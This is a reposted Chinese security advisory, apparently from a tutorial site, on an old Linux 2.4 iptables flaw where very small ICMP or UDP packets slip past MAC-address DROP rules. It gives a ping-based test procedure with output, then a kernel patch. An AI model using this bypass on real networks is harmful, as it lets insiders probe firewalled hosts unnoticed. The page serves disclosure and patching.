庞大资源库的计算机教程网站!
设为首页
加入收藏
总编信箱
投稿或申请专栏请先 [登 陆]
首页 操作系统 程序设计 图形图像 媒体动画 机械电子 WEB开发 数 据 库 办公系列 路由技术 网络原理 网络应用
认证考试 安全技术
首页>操作系统>Linux>系统安全>正文
资料搜索
Google搜索
Google
返回上级列表

推荐文章

快速保存网页中所有图片的方法
Windows中让光驱巧妙“隐身”技
防范非法用户入侵Win 2000/XP系
两款比较典型的ASP木马防范方法
有关表格边框的css语法整理
Windows XP中可以被禁用的服务
SQL Server导出导入数据方法
Javascript所有对象的属性的获
网页(HTML)中的特殊字符
与篮球共舞,尽显模式本色
QQ病毒的手工清除方法
Photoshop为极品美女打造性感睫
天衣无缝:IIS与PHP水火也相容
SQL Server存储过程编写和优化

Linux 2.4 iptables MAC地址匹配绕过漏洞

 作者:本站收集   日期:2005-3-13
字号选择〖 〗/ 双击滚屏 单击停止   


Linux 2.4 iptables MAC地址匹配绕过漏洞

受影响的系统:
Linux kernel 2.4
描述:
--------------------------------------------------------------------------------
Linux 2.4内核中包含一个新的功能强大的防火墙体系,名叫Netfilter.它的主要组件是
iptables. Iptables重包含了一个扩展模块是MAC模块,它可以基于MAC地址来匹配经过
防火墙的报文。这个模块主要是用来防止恶意内部用户通过修改IP地址进行欺骗攻击。

然而,MAC模块没有正确匹配长度很小的报文。例如,4个字节的ICMP或者UDP报文。
这使得内部攻击者可能利用这一漏洞来探测受iptables保护的主机是否存活,以及其他的
探测活动。

<*来源:John McEleney
Chris Wilson (chris@netservers.co.uk)
链接:http://archives.neohapsis.com/archives/bugtraq/2001-10/0057.html
*>


测试程序:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!



我们需要两台机器进行测试:

- Victim, 运行iptables
- Attacker, 可以发送小的ICMP或UDP报文

攻击者(Attacker)的MAC地址假设为:AT:TA:CK:ER:00:00

首先在Victim上禁止来自Attacker的MAC地址的ICMP报文:

victim# iptables -P INPUT ACCEPT
victim# iptables -F INPUT
victim# iptables -I INPUT -p icmp -m mac --mac-source AT:TA:CK:ER:00:00 -j DROP
victim# iptables -L INPUT -v
Chain INPUT (policy ACCEPT xxxx packets, xxxxxxx bytes)
pkts bytes target prot opt in out source destination
0 0 DROP icmp -- any any anywhere anywhere
MAC AT:TA:CK:ER:00:00


[现在报文和字节计数器都是零]

在Attacker上ping Victim主机:

attacker# ping -s 8 -c 1 Victim
PING Victim (xx.xx.xx.xx) from xx.xx.xx.xx : 8(36) bytes of data.


--- xx.xx.xx.xx ping statistics ---
1 packets transmitted, 0 packets received, 100% packet loss


[8字节的报文被丢弃了,这是正确的]

在Victim上:

victim# iptables -L INPUT -v
Chain INPUT (policy ACCEPT 231 packets, 39475 bytes)
pkts bytes target prot opt in out source destination
1 36 DROP icmp -- any any anywhere anywhere
MAC 00:03:47:87:BA:C5


[被丢弃的报文的数目和字节技术已经增加了]

在Attacker上重新发送小字节的ICMP报文:

attacker# ping -s 4 -c 1 Victim
PING Victim (xx.xx.xx.xx) from xx.xx.xx.xx : 4(32) bytes of data.
12 bytes from xx.xx.xx.xx: icmp_seq=0 ttl=255


--- xx.xx.xx.xx ping statistics ---
1 packets transmitted, 1 packets received, 0% packet loss


[这次报文被允许通过并返回了应答,没有被规则丢弃]

再来检查一下Victim上的记录:


victim# iptables -L INPUT -v
Chain INPUT (policy ACCEPT 231 packets, 39475 bytes)
pkts bytes target prot opt in out source destination
1 32 DROP icmp -- any any anywhere anywhere
MAC AT:TA:CK:ER:00:00


[丢弃报文的计数没有增加]


--------------------------------------------------------------------------------
建议:

厂商补丁:

1. 安装下列补丁并重新编译内核:

--- linux-2.4.9/net/ipv4/netfilter/ipt_mac.c Tue Oct 2 18:50:56 2001
+++ linux-2.4.9-ipt_mac-fix/net/ipv4/netfilter/ipt_mac.c Tue Oct 2
19:32:20 2001
@@ -20,7 +20,7 @@


/* Is mac pointer valid? */
return (skb->mac.raw >= skb->head
- && skb->mac.raw < skb->head + skb->len - ETH_HLEN
+ && (skb->mac.raw + ETH_HLEN) <= skb->data
/* If so, compare... */
&& ((memcmp(skb->mac.ethernet->h_source, info->srcaddr, ETH_ALEN)
== 0) ^ info->invert));

2. 或者等待安装更新版本的iptables(1.2.3以上版本)
http://netfilter.samba.org/

上一篇:Red Hat Linux Apache 远程列举用户名漏洞    下一篇:SAINT攻略  
[发送给好友]  [关闭窗口]  [返回顶部]   转载请注明来源:www.it00.com   
特别声明: 本站除部分特别声明禁止转载的专稿外的其他文章可以自由转载,但请务必注明出处和原始作者。文章版权归文章原始作者所有。对于被本站转载文章的个人和网站,我们表示深深的谢意。如果本站转载的文章有版权问题请联系编辑人员,我们尽快予以更正。
责任编辑: 原点 投稿作者: 本站收集
信息来源: 网络 录入时间: 2005-3-13
关于我们 - 广告服务 - 版权申明 - 网站地图 - 联系方式 - 总编信箱 - 会员投稿